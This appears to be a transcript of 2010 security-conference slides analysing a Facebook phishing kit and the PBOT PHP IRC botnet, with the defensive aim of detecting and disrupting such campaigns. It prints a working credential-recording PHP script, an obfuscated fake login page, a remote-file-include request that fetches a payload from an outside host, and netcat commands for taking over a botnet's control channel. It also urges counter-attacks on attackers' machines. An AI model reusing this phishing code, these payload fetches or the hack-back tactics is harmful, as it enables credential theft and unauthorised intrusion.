hitbsecconf 1 - hack in the boxconference.hackinthebox.org/hitbsecconf2010kul/materials... ·...
TRANSCRIPT
© TEHTRI-Security 1 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010 www.tehtri-security.com
© TEHTRI-Security 2 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Speaker
Laurent OUDOT – Founder & CEO of TEHTRI-Security (2010) – Senior Security Expert
• When ? 15 years of IT Security • What ? Hardening, pentests... • Where ? On networks and systems of highly sensitive places:
French Nuclear Warhead Program, United Nations, French Ministry of Defense…
– Research on defensive & offensive technologies • Past: Member of the team RstAck & of the Steering Committee of the
Honeynet Research Alliance... • Frequent presenter and instructor at computer security and
academic conferences like Cansecwest, Pacsec, BlackHat USA-Asia-Europe, HITB Dubai-Amsterdam, US DoD/US DoE, Defcon, Hope, Honeynet, PH-Neutral, Hack.LU
• Contributor to several research papers for SecurityFocus, MISC Magazine, IEEE, etc.
© TEHTRI-Security 3 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
About TEHTRI-Security
Company created in April 2010 Cutting-edge technologies – Advanced & Technical Consulting – Penetration Tests / Audits… – Fighting Information Leaks, Counter-Intelligence…
Worldwide: Conferences, Training, Consulting – Canada, Lebanon, United Arab Emirates, Singapore,
Netherlands, China, Malaysia, France... Around 30 public security advisories (6 months)
International Press / Media
© TEHTRI-Security 4 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Introduction
Goal: Analyze recent web attacks that targeted a huge number of people or servers
- End-users - Web servers Find & propose innovative solutions
Target audience: – White hats, people who fight Cybercrime, Business
Intelligence & Information Warfare
Notice: – Legal Issues: we remind you to carefully respect the
laws in your country before applying some techniques shown in this presentation (striking back, etc).
© TEHTRI-Security 5 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Plan
1 – About the Attacks 2 – Finding Counter-Measures 3 – Real Life Examples
© TEHTRI-Security 6 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
1. ABOUT THE ATTACKS Let’s have a look at some of those threats
© TEHTRI-Security 7 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Targeting the internet end-users
Simple example of action Phase 1: Compromise a web server and
add an evil payload on it – Client-side attack (exploit kit) • Goal: compromise workstations
– Pharming (password/data recorder) • Goal: steal sensitive data (credit card, passwd…)
Phase 2: Invite victims – Pown servers and send emails to tons of
end users (future potential victims) – Wait for them to connect & get trapped
© TEHTRI-Security 8 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Targeting random web servers
Phase 1: Identify a vector of intrusion that could be used against multiple servers during an offensive campaign – E.g.: Easy Remote File Include against a widely
spread web application Phase 2: Compromise servers to launch
the massive attack from there – E.g.: Target random servers or use Search
Engines to find targets Phase 3: Wait for servers to be
compromised and abuse them – E.g.: Create a Botnet containing web servers,
and use them to start evil activities (DDOS…)
© TEHTRI-Security 9 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Hiding such evil activities
Automatic & standalone tools and methods that attack & spread themselves directly – Kind of evil cyber life that works alone to
compromise servers, etc Multiple bounces – They have access to many compromised
servers which allows them to bounce and then sometimes hide their addresses, etc
Timeline – “Quick Wins” – Short period of attacks but multiple attacks
© TEHTRI-Security 10 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
2. FINDING COUNTER-MEASURES
© TEHTRI-Security 11 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Finding Counter-Measures
To protect against such massive web attacks, we need to improve some fields
Detection – Improving web based intrusion detection
Protection/Containment – Improving hardening of web servers
Active Response – Identify the attackers, – Identify the human targeted, – Counter-attack…
Internet contains millions of web sites that can be compromised easily – Such massive web attacks will still exist for a while
© TEHTRI-Security 12 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
LIVE REVIEW OF EVIL SOURCE CODE
Let’s have a look at some sources stolen to some web attackers
© TEHTRI-Security 13 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
3. REAL LIFE EXAMPLES
And now let’s have a look at two major threats 3.1 will focus on pharming against social networks 3.2 will focus on botnet with web sites included as zombies
© TEHTRI-Security 14 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
3.1 PHARMING ATTACK AGAINST FACEBOOK
Here is an example about how to handle an unknown pharming attempt. The example will focus on a real attack that happened in 2009, against Facebook.
© TEHTRI-Security 15 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Pharming against Facebook
Phishing attack with tons of emails sent asking to login facebook
Fake facebook portal recording emails and passwords
© TEHTRI-Security 16 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
FAKE FACEBOOK LOGIN PAGE (SOURCE)
Fake Facebook Page : HTML sent
Here is the fake Facebook login page that was hosted on some compromised web servers
This HTML (javascript) code was sent to the incoming clients, thinking they were on Facebook
<script>!<!--!!document.write(unescape("%3C%21DOCTYPE%20html%20PUBLIC%20%22-//W3C//DTD%20XHTML%201.0%20Strict//EN%22%0D%0A%20%20%20%22http%3A//www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd%22%3E%0D%0A%3Chtml%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%20xml%3Alang%3D%22en%22%20lang%3D%22en%22%20id!
!....!!%7C%7C%7B%7D%29.checked%20%3D%200%3B%0D%0A%7D%0D%0A%0D%0Afunction%20pop%28url%29%20%7B%0D%0A%20%20window.open%28url%29%3B%0D%0A%7D%0D%0A%3C/script%3E%3C/div%3E%3C/body%3E%0D%0A%3C/html%3E%0D%0A%0D%0A"));!
//-->!</script>!
© TEHTRI-Security 17 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
This javascript generates HTML
It contains the fake login FORM This FORM sends the HTTP Client to « write.php » which is
hosted on the same compromized computer !<form method="GET" action="write.php" id="https://login.facebook.com/login.php?login_attempt=1">!
When a victim tries to log in, here is the GET request sent to « write.php » !http://compromizedhost.tld/fake-facebook/write.php?charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&fb_dtsg=&version=1.0&return_session=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&[email protected]&pass=oldsecret!
© TEHTRI-Security 18 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Behavior of “write.php”
Once someone sends his login/password, he is redirected to another web page, which is the real Facebook page
The end used, will then have to login (again ?) on the real facebook page – This is not really stealth, but many end users just thought
there were an temporary error HTTP packet sent by « write.php »
HTTP/1.1 302 Found!Date: Tue, 28 April 2009 07:13:12 GMT!Server: Apache/2.0 (Unix) PHP/4.3!X-Powered-By: PHP/4.3!Location: http://www.facebook.com/login.php!Content-Length: 0!Keep-Alive: timeout=5, max=100!Connection: Keep-Alive!Content-Type: text/html!
© TEHTRI-Security 19 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Was it stealth on Facebook’s side ?
The fake Facebook webpage contained references to resources (images, javascript...) hosted on facebook infrastructure, like: – http://static.ak.fbcdn.net/favicon.ico?8:132011!– http://b.static.ak.fbcdn.net/rsrc.php/zEDCY/lpkg/hm02tea0/en_US/141/160771/js/40m30takmjqccw4c.pkg.js!
– ... Thanks to the REFERER sent by (most)
Web clients, it was possible to get the URL of the pharming kit against FB
© TEHTRI-Security 20 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
What was possible then ?
Contact the webmasters / admins of the compromized sites used to host the evil facebook fishing script
And ask them to send the files involved for further analysis – 3 files found • index.htm Fake Login Web Page • write.php Password recorder+302 redirector • passes.txt ALL THE STOLEN PASSWORDS
© TEHTRI-Security 21 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Analyzing “write.php”
PHP Script that records any GET arguments (cleartext output) !<?php!header("Location: http://www.facebook.com/login.php");!$handle = fopen("passes.txt", "a");!foreach($_GET as $variable => $value)!{!fwrite($handle, $variable);!fwrite($handle, "=");!fwrite($handle, $value);!fwrite($handle, "\r\n");!}!fwrite($handle, "\r\n");!fclose($handle);!exit();!?>!
© TEHTRI-Security 22 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
So, what contained “passes.txt” ?
It contained the email / passwords of any end users who thought it was a real email from Facebook...
Example ...!charset_test=€,´,€,´,水,Д,Є !fb_dtsg= !version=1.0 !return_session=0 [email protected]!pass=oldsecret!...!
© TEHTRI-Security 23 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
What could be done then ?
Containment – Any email address compromised could be “blocked”,
and the end-user could be contacted, by asking for a new password to be set
Track the attackers – The webmasters / admins of the compromised web
server that hosted the pharming script, could help with the logs of the site
– Good questions: • Who asked for “passes.txt” ? IP address of attackers • When ? Look at the different dates • How many Facebook end-users were compromised…?
– Size of bytes sent ? • A.B.C.D - - [28/Apr/2009:17:07:47 +0200] "GET /..../
passes.txt HTTP/1.1" 200 194 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
• Here we have to look at the users included in first 194 bytes
© TEHTRI-Security 24 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Innovative solution?
Tiny-Offensive solution for FB if they don’t have the help of the compromised hoster – For each resource (pictures) asked by clients coming
from the compromised host (see REFERER) just send big fake pictures in RED with Security Notice
Semi-Offensive solution that could be tried by Facebook (Trap !) – “Handle” the accounts compromised on FB – Add fake accounts on FB – Log anything related to those accounts on FB – Add those accounts in “passes.txt” – Wait for the attackers to read that file – Each time they connect on the fake accounts, it’s more
time to gather more info about them (law enforcement possibilities, etc)
© TEHTRI-Security 25 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
More innovative solution?
Example of an offensive solution that could be tried by FB: – Change “passes.txt” so that the attackers are sent to another
page for counter-attack plans (intrusion on attackers’ comp or identify them) $ rm passes.txt; cat > passes.txt.php !
<?php header("Location: http://malicious-site/anti-attackers/"); ?>!
– Samples for such a session from an attacker GET /malware/fb/passes.txt HTTP/1.1!
Host: compromised-hosting-server!
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) Firefox/3.6!
Accept: text/html,application/xhtml+xml,application/xml!
HTTP/1.1 302 Found!
Server: Apache/2.2.14 (Unix) OpenSSL/0.9.8l DAV/2 PHP/5.3.1!
Location: http://malicious-site/anti-attackers/!
© TEHTRI-Security 26 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
3.2 WEB BASED BOTNET
Here is an example of a technique that creates a botnet full of web servers…
© TEHTRI-Security 27 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Adding Web Sites into a Botnet MASSIVE ATTACKS
COMMAND & CONTROL CHANNEL
MASSIVEORDERS
FINAL ACTION (e.g.: DDOS) Web sites
© TEHTRI-Security 28 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
PBOT: The PHP Botnet
RFI Attackers – Automatic Web Scan
against PHP If a PHP site is
vulnerable to a RFI, the web server is turned into a zombie with PBOT
IRC Command & Control – Login / Password – Many actions
proposed
© TEHTRI-Security 29 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Hunting PBOT, PHP BotNet
Phase 1: Identify a PBOT Attack – Analyze your logs (web server) – Find RFI (Remote File Include) tests
and check if it’s a PBOT http://www.yoursite.tld/yourscript.php?
yourargument1=http://ownedbox.tld/evilrepository/payload.txt?!
Phase 2: Analyze source code and retrieve sensitive information – IRC Server, Port, Password,
Channel... – Version of PBOT, Protocol used (e.g.
over IRCII PRIVMSG), Internal Password...
Phase 3: Counter-Attack – Infiltrate the Botnet – Identify the compromized
computers (to alert the CERTs, Administrators, host owners, etc)
– Kill Pbot
Sample from the source code
class pBot !{ !var $config = array(!
!"server"=>"a.b.c.d", !!"port"=>6669, !!"pass"=>"", //senha do server!!"prefix"=>"owned|", !
"maxrand"=>8, !!"chan"=>"#pbotchannel", !!"key"=>"oxi", //senha do canal!
!"modes"=>"+p", !!"password"=>"l33tP4sS", //senha do bot!!"trigger"=>".", !!"hostauth"=>"*" // * for any hostname !
); !
© TEHTRI-Security 30 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Infiltrate the Botnet
How to connect to the remote IRC Server – Use the native PHP code from Pbot (which become a
PHP Client Honeypot) or modify it, – Or sometimes use an IRC Client or by hand
Example by hand (safe) – Connect
• nc -nvv a.b.c.d 6669 – Send your yousername + nickname
• USER ownedolsyezun 127.0.0.1 localhost :ownedolsyezun • NICK owned|34944893
– If you get a PING, reply with the PONG • PONG :xxxxxxxx
– Join the channel of the Zombies... • JOIN #pbotchannel oxi
– Become administrator of any zombie of this Botnet • PRIVMSG #pbotchannel :.user l33tP4sS
© TEHTRI-Security 31 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Identify who is infected
Use their command & control channel – PRIVMSG #pbotchannel :.info
:owned|[email protected] PRIVMSG #pbotchannel :[Vuln!]: http://www.xxxxx/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??]! Nickname, username of the Zombie (Random)
:owned|86540828!~ownedjzytf
IP, Hostname of the zombie x.a.b.c
PHP Script that is vulnerable to an RFI! http://www.xxxxx/index.php!
PHP Script that is vulnerable to an RFI! _REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid
%5d=1&GLOBALS=&mosConfig_absolute_path=http://a.b.c.d/evil??
PBOT Repository that was used for this infection http://a.b.c.d/evil??!
© TEHTRI-Security 32 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Kill the BotNet
How to ask all the bot on the channel to die ? case "die":! ! ! // MESSAGE USED ON THE COMMAND & CONTROL CENTER !
!$this->send("QUIT :MORRI! comando por $nick"); // OUTPUT SENT ON THE CHANNEL!!fclose($this->conn); !// CLOSE THE FILE DESCRIPTOR (SOCKET) FOR THIS SESSION !!exit;! ! ! ! // AND EXIT !
Broadcast this command to any bot in the channel – PRIVMSG #pbotchannel :.die
Stealth alternative: direct PRIVMSG to any zombie... Output retrieved through such a command
– You see all the different zombies dying...!:owned|[email protected] QUIT :Read error: EOF from client!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!
:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!:owned|[email protected] QUIT :Quit: MORRI! comando por owned|34944893!
...!
© TEHTRI-Security 33 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
LIVE REVIEW OF EVIL SOURCE CODE
Let’s have a look at some sources stolen to some web attackers
© TEHTRI-Security 34 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
CONCLUSION
© TEHTRI-Security 35 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
Conclusion
Massive web attacks – It’s simple – It’s cheap – It happens now – But the IT Security world don’t talk too much
about those threats (not enough technical ?) • They prefer to focus on threats that happen in laboratories
(super futuristic exploits, etc)
Improve monitoring & Take a look at your logs – Track down the attackers – Steal their tools – Share your findings – Improve Internet Security
“Life is short, Play hard”
© TEHTRI-Security 36 www.tehtri-security.com HITBSecConf Kuala Lumpur 2010
This is not a game. ���
Take care. Thanks.
www.tehtri-security.com
Contact TEHTRI-Security When you catch a web malware…
When you need technical assistance… Meet TEHTRI-Security Ask for our trainings…
web (at) tehtri-security (dot) com